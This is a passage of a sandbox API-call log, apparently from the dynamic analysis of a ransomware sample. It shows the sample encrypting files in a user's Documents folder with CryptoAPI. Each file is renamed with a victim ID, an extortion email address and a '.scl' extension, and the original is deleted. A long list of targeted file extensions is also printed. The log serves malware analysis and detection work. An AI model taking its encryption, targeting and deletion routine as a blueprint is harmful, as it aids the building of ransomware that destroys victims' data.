	[0185.634] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1c7a, dwBufLen=0x1c7a | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x1c80) returned 1
	[0185.636] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.636] RtlMoveMemory (in: Destination=0xfdee08, Source=0xfdd180, Length=0x1c7a | out: Destination=0xfdee08) 
	[0185.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.637] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdee08*, pdwDataLen=0x18bc0c*=0x1c7a, dwBufLen=0x1c80 | out: pbData=0xfdee08*, pdwDataLen=0x18bc0c*=0x1c80) returned 1
	[0185.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.637] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0185.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.637] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0185.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.638] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0185.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.638] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.639] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.640] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0185.640] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.641] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdee08*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdee08*, lpNumberOfBytesWritten=0x18c068*=0x1c80, lpOverlapped=0x0) returned 1
	[0185.644] CloseHandle (hObject=0x2c0) returned 1
	[0185.644] CloseHandle (hObject=0x384) returned 1
	[0185.644] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods")) returned 1
	[0185.647] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gruycjv3nf.ods")) returned 0
	[0185.648] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd5410, ftCreationTime.dwHighDateTime=0x1d92d79, ftLastAccessTime.dwLowDateTime=0xdf33700, ftLastAccessTime.dwHighDateTime=0x1d9552e, ftLastWriteTime.dwLowDateTime=0xdf33700, ftLastWriteTime.dwHighDateTime=0x1d9552e, nFileSizeHigh=0x0, nFileSizeLow=0x6a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="H8LzK9u.docx", cAlternateFileName="H8LZK9~1.DOC")) returned 1
	[0185.648] lstrcmpW (lpString1="H8LzK9u.docx", lpString2="..") returned 1
	[0185.648] lstrcmpW (lpString1="H8LzK9u.docx", lpString2=".") returned 1
	[0185.648] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.648] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="H8LzK9u.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\H8LzK9u.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\H8LzK9u.docx"
	[0185.648] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\H8LzK9u.docx") returned 44
	[0185.648] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.649] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\H8LzK9u.docx", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx") returned 0x2c
	[0185.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.649] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.649] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx"
	[0185.649] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx") returned 44
	[0185.649] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.650] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0185.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.650] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.650] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.651] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.652] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.652] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6a26, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x6a26, lpOverlapped=0x0) returned 1
	[0185.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.656] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0185.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.658] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.659] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.659] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0185.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.659] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x6a26, dwBufLen=0x6a26 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x6a30) returned 1
	[0185.660] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.661] RtlMoveMemory (in: Destination=0xfe3bb0, Source=0xfdd180, Length=0x6a26 | out: Destination=0xfe3bb0) 
	[0185.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.661] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3bb0*, pdwDataLen=0x18bc0c*=0x6a26, dwBufLen=0x6a30 | out: pbData=0xfe3bb0*, pdwDataLen=0x18bc0c*=0x6a30) returned 1
	[0185.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.664] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0185.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.664] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0185.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.664] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0185.664] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.665] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.665] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.667] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 86
	[0185.667] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.668] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe3bb0*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe3bb0*, lpNumberOfBytesWritten=0x18c068*=0x6a30, lpOverlapped=0x0) returned 1
	[0185.672] CloseHandle (hObject=0x2c0) returned 1
	[0185.672] CloseHandle (hObject=0x384) returned 1
	[0185.673] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx")) returned 1
	[0185.681] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\h8lzk9u.docx")) returned 0
	[0185.681] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3a9d60, ftCreationTime.dwHighDateTime=0x1d9574b, ftLastAccessTime.dwLowDateTime=0x53b58980, ftLastAccessTime.dwHighDateTime=0x1d96db3, ftLastWriteTime.dwLowDateTime=0x53b58980, ftLastWriteTime.dwHighDateTime=0x1d96db3, nFileSizeHigh=0x0, nFileSizeLow=0x32cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="hnIbznE3E.docx", cAlternateFileName="HNIBZN~1.DOC")) returned 1
	[0185.681] lstrcmpW (lpString1="hnIbznE3E.docx", lpString2="..") returned 1
	[0185.682] lstrcmpW (lpString1="hnIbznE3E.docx", lpString2=".") returned 1
	[0185.682] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.682] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="hnIbznE3E.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\hnIbznE3E.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\hnIbznE3E.docx"
	[0185.864] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\hnIbznE3E.docx") returned 46
	[0185.864] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.865] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\hnIbznE3E.docx", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx") returned 0x2e
	[0185.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.865] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.865] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx"
	[0185.865] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\hnibzne3e.docx") returned 46
	[0185.865] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.866] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0185.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
